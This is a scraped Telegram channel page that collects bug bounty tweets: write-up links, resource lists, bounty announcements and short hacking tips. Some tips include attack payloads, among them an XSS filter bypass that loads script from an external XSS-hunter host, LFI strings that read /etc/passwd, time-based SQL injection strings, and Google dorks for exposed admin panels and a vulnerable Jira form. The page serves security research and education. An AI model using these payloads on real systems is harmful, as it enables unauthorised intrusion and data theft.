Bug Hunting Hub
797 subscribers
13 photos
331 links
The source of insights for Bug Hunters. The channel is driven by bot, curated by twitter.com/makrushind
instagram.com/makrush.in
Download Telegram
to view and join the conversation
#BugBountyTips of the Day
Thank you @GoogleVRP #BugBounty https://t.co/bRuIhhbAAy
---
If you find #SSRF and got stuck with cloudflare go and take a look at my write up: " https://t.co/1AeGVINWwF" #cloudflarebypass #bypass #bugbountytips
---
I started publicising some notes. I will populate it a lot more over the coming days! #ios #bugbounty #hacking https://t.co/sHUKD3XXpb
---
RCE in my Fav Program :) ❤️#TIP: Does the target use AEM? try this path target[.]com/etc/groovyconsole.html and use the payload in the pic If you lucky enough you can have nice RCE ;) Good luck :) #bugbounty #bugcrowd #bugbountytips https://t.co/EVnlDeWmjH
---
XXE Resources to learn and practice 🔥 ------ Blogs: https://t.co/Cy7S0QRRTb https://t.co/BzguZ70Kb0 https://t.co/4RhFjbMC65 https://t.co/bGh0do4Dm4 https://t.co/tK9eeFdpta https://t.co/fsCrlMGH0y https://t.co/2Upu9TJxqh https://t.co/fBO3ONfjga #cybersecurity #bugbounty
---
OS Command Injection using markdown image upload ![a][/uppoads/test/../../../../../../../../etc/passwd]| 1. Uploading a PoC made with Markdown 2. Download the file after converting it to an attachment. 3. Expose the list of /etc/passwd files in the download list. #bugbounty
#BugBountyTips of the Day
Admin pwnd}} Why google Dork Important: Site:*.target.com inurl:Admin/Dashboard.php -> SingUp New account With Admin privilege Got 422241 contact Details and 457025 Company's Details with Delete and edit Privileges! #bugbounty #bugbountytips #infosec
---
Got my first job as a pentester because of #bugbounty :) From 5 backlogs with a cpi of 6.5 to here yes it can really change your life :)
---
How to Exploit XSS? 1-Find the blacklisted/filtered characters. 2-Observe what tags are blocked by WAF and which keywords are allowed (iframe, img, body etc.) #bugbounty #bugbountytips #bugbountytip
---
Here's my writeup on my finding.😄 Issue: Facebook email disclosure and account takeover #bugbounty #bugbountytips #facebookbugbounty https://t.co/m3vwqcZhFC
---
Want to learn SSRF? save this thread 🔥 (1/5) Blogs: https://t.co/pnUhb9b1MH https://t.co/NoWhMJsv5K https://t.co/VXAMp7hYq1 https://t.co/A8Vxj4TWHS https://t.co/HkmSq8xOOB https://t.co/Jy16amvz22 https://t.co/mM647kiaXZ https://t.co/Fo9SuhYOke #bugbounty #cybersecurity
#BugBountyTips of the Day
Oauth Security Issues 1-Access token passed in request body 2-Open Redirection at redirect_uri parameter 3-Host header injection at access token request 4-Client secret leaks 5-Improper Oauth token validation #bugbounty #bugbountytips #bugbountytip
---
The Red Team Village Schedule during @Hacker0x01 's [email protected] is now live! https://t.co/3b9dj2b9Dk #CyberSecurity #BugBounty https://t.co/PGv6EV7XjP
#BugBountyTips of the Day
Yay, I was awarded a $7,500 bounty on @Hacker0x01 ! https://t.co/JRIv8FiWeK #togetherwehitharder #TogetherWeHitHarder #bugbountytips #hack #bug #security #bugcrowd #bugbounty #infosec #hackerone https://t.co/EpXet3q6ZG
---
Love working with @msftsecresponse. Another critical Azure vulnerability. This time an RCE 🤩 #BugBounty #Azure @wiz_io https://t.co/gRp5Sssst6
---
Found 2 Reflected XSS using #Reflector A product by @SecurityFoster for finding XSS Vulnerability. 🧐🧐 #SRT #bugbountytips #BugBounty https://t.co/4mVoNqBWCn
---
13 ways to bypass an OTP Credits: @harshbothra_ #otpbypass #bugbounty #bugbountytips #infosec https://t.co/7rxSfIVoHA
---
Hey Guys, Check out my list of nuclei templates at https://t.co/LiqKEDAlc5 Thanks to all the authors for the templates❤️❤️ I'll be adding more templates in future @pdnuclei @NucleiTemplates #bugbountytips
#BugBountyTips of the Day
No bounties? Keep hunting and learning Low bounties? Keep hunting and learning Good bounties? Keep hunting and learning The aim is to be consistent #bugbountytips
---
Burpsuite is more than just a proxy ! Listed below my useful Burpsuite extensions for Web-hacking. Website : https://t.co/uUBStxWJ29 #hackerone #secnhack #bugcrowd #bugbountytips #infosec #cybersecurity #offensivsecurity #ceh #ethicalhacking https://t.co/DgVQKUpdWT
---
Alternate data streams sound like this 🤯 to you? Well, thankfully we have @almroot jumping in to help, telling us how to leak source code or bypass authentication with that 🦀 #bugbountytips 👇 https://t.co/BFu5rchjFl
---
Hello everyone! I just published a new write-up, please check it out and let me know if you enjoyed reading it :) https://t.co/rWQCJXnRJh #bugbounty #bugbountytips #infosec #togetherwehitharder
#BugBountyTips of the Day
Bug bounty tip to easily get $1.2 million 🤑 Use <script>alert("XSS")</script> to test for XSS Google Pays $1.2 million for this https://t.co/lrAMPAJ0uv Follow for more #bugbounty #cybersecurity tips and become #rich without #cryptocurrency #bitcoin🤑 🤑 🤑 🤑🤑 🤑 🤑 🤑 https://t.co/tJ1khstC21
---
Top P1 to find :- 1) SQL Injection 2) IDOR 3) XSS 4) CSRF 5) Session Fixation 6) OAuth Misconfiguration 7) Missing Authentication 8) Session Hijacking 9) Secret Tokens / Secret Credentials leakage 10) Use of Default Credentials #bug #cybersecurity #infosec #bugbountytips #Dev
---
If you're wondering why you should create your own @pdnuclei templates, check out this 🧵 #hackwithautomation #bugbounty #cybersecurity
---
A write-up on how I hacked Millions of IRCTC Passengers' ticket details. Thank you: @th3cyb3rc0p @HemantSolo @ADITYASHENDE17 @theXSSrat @e11i0t_4lders0n @PawanRa20262178 @Pethuraj @Anirudh533 @asterfiest @logicbomb_1. #bugbounty #bugbountywriteup https://t.co/FK1yktH4kg
---
Awesome repo to learn Javascript created by @Asabeneh https://t.co/dCsnnFNN0u #bugbounty #infosec #javascript #javascript30 #programmers
#BugBountyTips of the Day
How i hacked world wide Tiktok users #BugBounty #infosec #CyberSecurity #hacking #TikTok https://t.co/2fNJRQcpID
---
Burpsuite Extensions one should have :- 1) HTTP Request Smuggler 2) HUNT 3) InQL for Graphql Vulnerabilities 4) J2EE Scan 5) Json/JS Beautifier 6) JSON web token Attacker 7) xssValidator 8) Ferida 9) Hackvertor #bugbounty #bug #dev #cybersecurity #opensource #infosec
---
My first RCE on bug bounty :) Thank you @HusseiN98D for the tips #BugBounty https://t.co/TFd5d0rDU5
---
El Webinar Gratuito: "Romper Contraseñas con Tablas Arco Iris" está disponible en video. #hacking #cybersecurity #bugbounty #osint #forensics 🌎 https://t.co/Z9YRtclEDz https://t.co/lGiLOggZVM
#BugBountyTips of the Day
Hi everyone, here is my first writeup about a reflected XSS which I escalated to achieve Account Takeover. I hope you all like it, enjoy reading!! #bugbounty #bugbountytips #infosec #hackerone #bugcrowd #synack https://t.co/nDMrVX90JD
---
+ onfocus=xxxx --> Blocked + onfocus=$.ajax({url:' http://'.concat('yourxsshunder .xss.ht'),dataType:'script',success:'success'}) --> Boom! @Hacker0x01 #XSS #bugbountytips bypass Imperva https://t.co/dB0DwQFDEl
---
#bugbounty took many of us from the poor phase to the good living.Appreciate what's sent to you and trust the process.Gratefull to this community and this world. Like I just took vacations when others are working, staying in a 5 stars hotel,bought $5k gifts for fam.What's better?
---
Me and @XHackerx007 earned $7,500 for our submission 3 in 1 on @bugcrowd #ItTakesACrowd #bugbountytip Login Panel On burp inspected the response from the Login request response was on my testing like [{"param1":false,"param2":false,]etc.. changed the value false to true https://t.co/gZT62emYie
---
#bugbounty hunters that refuse to give bug info to companies without promise of a reward are the lowest of the low. Attempting to extort companies for money/rewards is lame and a major reason people still dont trust hackers after all the good we have done.
---
Two Easy RCE in Atlassian Products 1-Jira Remote Code Execution in Contact Administrators form (CVE-2019–11581) =To find all public instances with such functionality you just need to search for: inurl:secure/ContactAdministrators!default.jspa #bugbounty #bugbountytips
---
Write-up on how a Facebook bug could have exposed your email/phone number to your friends. Quick and easy.😉 Bounty: $18250 #BugBounty https://t.co/MEBcpyWV3Z
---
(1/2) LFI WAF Bypass file:/etc/passwd?/ file:/etc/passwd%3F/ file:/etc%252Fpasswd/ file:/etc%252Fpasswd%3F/ file:///etc/?/../passwd file:///etc/%3F/../passwd file:${br}/et${u}c/pas${te}swd?/ file:$(br)/et$(u)c/pas$(te)swd?/ #bugbounty #bugbountytips #cybersecurity #infosec
---
Bug: Broken access control 1. Admin add User-A 2. User-A capture request on adding files 3. Admin remove User-A 4. User-A can edit the file details from captured request & add new files forever😀 #bugbounty #bugbountytips #hackerone https://t.co/dUk5VAx1N4
---
El Webinar Gratuito: "Recopilar Información con Kali Linux 2.0" está disponible en video. #hacking #cybersecurity #bugbounty #osint #forensics 🌎 https://t.co/BjEA8UM9Cm https://t.co/pjhIDWLFUz
#BugBountyTips of the Day
El Webinar Gratuito: "Reconocimiento Web con Kali Linux 2.0" está disponible en video. #hacking #cybersecurity #bugbounty #osint #forensics 🌎 https://t.co/AoEsEJbuCF https://t.co/sRddPIYLsD
---
How to find an RCE in a Bug Bounty Program There are two common situations where a Remote Code Execution can occur: #bugbounty #bugbountytips #bugbountytip
---
Happy to reach the 5000 reputation milestone on @Hacker0x01 #BugBounty https://t.co/9TYTADoUcb
---
LFI WAF Bypass #copy file:/etc/passwd?/ file:/etc/passwd%3F/ file:/etc%252Fpasswd/ file:/etc%252Fpasswd%3F/ file:///etc/?/../passwd file:///etc/%3F/../passwd file:${br}/et${u}c/pas${te}swd?/ file:$(br)/et$(u)c/pas$(te)swd?/ #bugbounty #bugbountytips #cybersecurity #infosec
---
#امن_المعلومات #bugbountytips الأداءة الصينية OneForAll من افضل الادوات في استخراج السب دومينات ولها مزايا كثيرة مثل Alive TakeOver Brute force وغيرها الكثير اترك لكم اكتشافها https://t.co/hAw5jkX28k https://t.co/tEamMIgOl9
---
Sensitive information disclosure:- 1. Gathered some subdomains and were checking them one by one. 2. On one subdomain checked @Wappalyzer and found out that firebase db is used. 3. Checked the source code and found the firebase db URL. #bugbountytips 1/2
---
El Webinar Gratuito: "Wireshark" está disponible en video. #hacking #cybersecurity #bugbounty #osint #forensics 🌎 https://t.co/aqsiEHyTSu https://t.co/DHbDYe9p6c
#BugBountyTips of the Day
Keep DeFi safe Keep @BinanceChain #BSC safe Keep our user funds #SAFU - That’s our priority🛡 📢$100,000 Bug Bounty Program launched! Details: https://t.co/WF0X8iub3n Find a bug, get rewarded💰 #TrustTheSamurai Trust #Acryptos $ACS $ACSI #bugbounty @news_of_bsc @BSCTimes https://t.co/KPgDMRs885
#BugBountyTips of the Day
I review JavaScript manually. Here are some videos by bounty hunters that should give you an idea to approaching targets with heavy JavaScript. Stok https://t.co/p8uFlASuvp TomNomNom https://t.co/w8Nt2HFhMw Filedescriptor https://t.co/crnkPRE1J3 #bugbountytips
---
I have mentioned a couple of times that Google is your best friend for hacking & ya should know it very well to bag some extra $$ This is personally what I follow : https://t.co/NiiLZ2s4JR #infosec #appsec #security #bugbounty #bugbountytip #bugbountytips #hackers #learn365
---
#bugbountytips #bugbountytip #tip 90% from my finds in SQL injection as [POST Request] 1 Login page in username parameter 2 Forget password page username parameter 3 Singup Page firstname and last name parameter ' WAITFOR DELAY '0:0:5'-- ';WAITFOR DELAY '0:0:5'-- ===>Comment https://t.co/CO4Izh48gQ
---
Did you know that you could dump information on all @drupal installed modules? Let's discover that confidential information! 💥 @SanderWind is coming in to help us out today! 🍃 #bugbountytips 👇 https://t.co/5IjgCMyDMl
---
GraphQL Pentesting Resources: (1/2) Blog: https://t.co/IIV8iviqf6 https://t.co/zK8sqidXlr https://t.co/T1d75R6U3J https://t.co/cf9m7C4gCz https://t.co/nU671yYYfO https://t.co/tuzSx7AhDc https://t.co/Xoe6CsrbDp https://t.co/jdvRdYzQFm https://t.co/uLRlUe0L1d #bugbounty #infosec
---
9 RCE, 5 stored xss, 4 IDOR, and 3 LFI reported this week. Nice #BugBounty week
---
One of the best ways to confirm a SQL injection is by making it operate a logical operation and having the expected results. For example: if the GET parameter ?username=Peter returns the same content as ?username=Peter' or '1'='1 then, you found a SQL injection. #bugbountytips
First photo from the circle keeps five years of difference: first presentation, hosted in Samara State Aerospace University campus for the audience full of CTF teams with firing eyes, at VolgaCTF - a “ for student, by student” event, organized by group of enthusiasts. 5 years later, VolgaCTF is full of sponsors and partners, hosted in conference halls and streamed worldwide. But still, an independent event, organized by the group of enthusiasts, keeping the same fire in the eyes.

We also keep our eyes shining there: last year our teammates occupied agenda of the event, this year our young Jedis occupied top of the competition scoreboard. Looking forward to next year @volgactf!
#BugBountyTips of the Day
I know its not new but i made it anyways - script does checks for any oob interactions using the xmlrpc pingback feature. go bonkers on doing en masse scans on bugbounty programs @sickcodes @johnjhacking @wabafet1 @kaoudis #bugbounty #security https://t.co/JbQIyZkiwU
---
Race Condition to Limit Bypass in Add User Function and a 3-digit €€€ bounty I wrote a write-up about Limit Bypass via Race Condition vulnerability, and we broke the counter. In this function, impact has been escalated.🧙‍♂️ https://t.co/QQfozfawfn #bugbounty #bugbountytips
#BugBountyTips of the Day
AllianceBlock launches the LMaaS User Interface v2.0 BETA + Bug Bounty at https://t.co/QKBnNIkNTq For more info read: https://t.co/pbqgajeiGt $ALBT #liquiditymining #bugbounty #defi
---
The new #HTB & @HackerOne #BugBounty Hunter job-role path is OUT 🤯 Get the new #HTBAcademy annual subscription: 43% OFF until Sept 25! The entire Bug Bounty Hunter path All modules up to Tier II One exam voucher per year to become a certified Bug Bounty Hunter! https://t.co/vlTKwxjevA
---
Local File Inclusion vulnerability - LFI : a short flyer. Thanks to @Farah_Hawaa for doing the review. ♥️ Download: https://t.co/VXwOEyDFOd Newsletter: https://t.co/mjNKfRoC9n #infosec #appsec #zines #bugbountytips #bugbounty #bugbountytip #Learn365 #security #cybersecurity https://t.co/00iKrm7IIH
---
FINALLY FOUND SQLi. A little writeup is here: https://t.co/xSBL3SweXs #bugbounty #bugbountytips #hacking #sqli #bugbountytip Thanks @SynackRedTeam https://t.co/bLWGUPQS6H
---
Got my H1 Cap (1500 rep swag) from @Hacker0x01 Thanks @Hacker0x01 for sending swags. #bugbounty #hackerone https://t.co/eQ7BDdEXnM
---
Thanks @sirdarckcat and @GoogleVRP. Always wanted to have a physical copy of this great book. #cybersecurity #infosec #bugbounty https://t.co/97Iy2hdGHz
#BugBountyTips of the Day
🔥 echo https://t.co/T8DfRslPQM | subfinder -silent | httpx -silent | cariddi -intensive #bugbounty #reconParams https://t.co/cmmALAZsj7
---
always when you found API endpoint like "/api/v4/anything" add "internal" to the route and you will be surprised 😃 for example : /api/v4/users/<userid> =>> 403 /api/v4/internal/users/<userid> =>> 200 #bugbountytips
#BugBountyTips of the Day
An attendee at my Workshop at @THREAT_CON just received a $10,000 bounty after learning some tips I dropped during the session. Can't be more proud, keep going @skonage1 ! 🥂🎉 #bugbounty https://t.co/2z69hwfe5Y
---
#bugbountytips https://t.co/Uj6gbQtEDP
---
It is against Facebook terms to escalate SSRF to RCE. If you find a SSRF on Facebook you must stop investigating and report it. Failure to do so results in a $0 bounty. #bugbountytips
---
mXSS in https://t.co/T1IHLkaVR2 This was a collaboration with @lbherrera_ https://t.co/5KHr2JPimK #mxss #bugbountytips #xss
---
Web Pentesting Resources: https://t.co/4eM4EQpIs4 https://t.co/XcVtMKEJwY https://t.co/mIF95QYYXT https://t.co/mYHz584Eu3 https://t.co/ylzoYc2Mbq https://t.co/95vTsOlV5l https://t.co/Cly2GfS1VN https://t.co/hS5jM86k6B #websecurity #cybersecurity #infosec #bugbounty
---
#Easy #P1 #bugbountytips #bugbounty Steps for leet bounty : 1- Visited subdomain 2- Found login page with google sso 3- Logged in with my google account as low level user 4- Tried to access high privileged endpoints ( look in js files) 5- Pwned company datahub https://t.co/6IroLZHHaO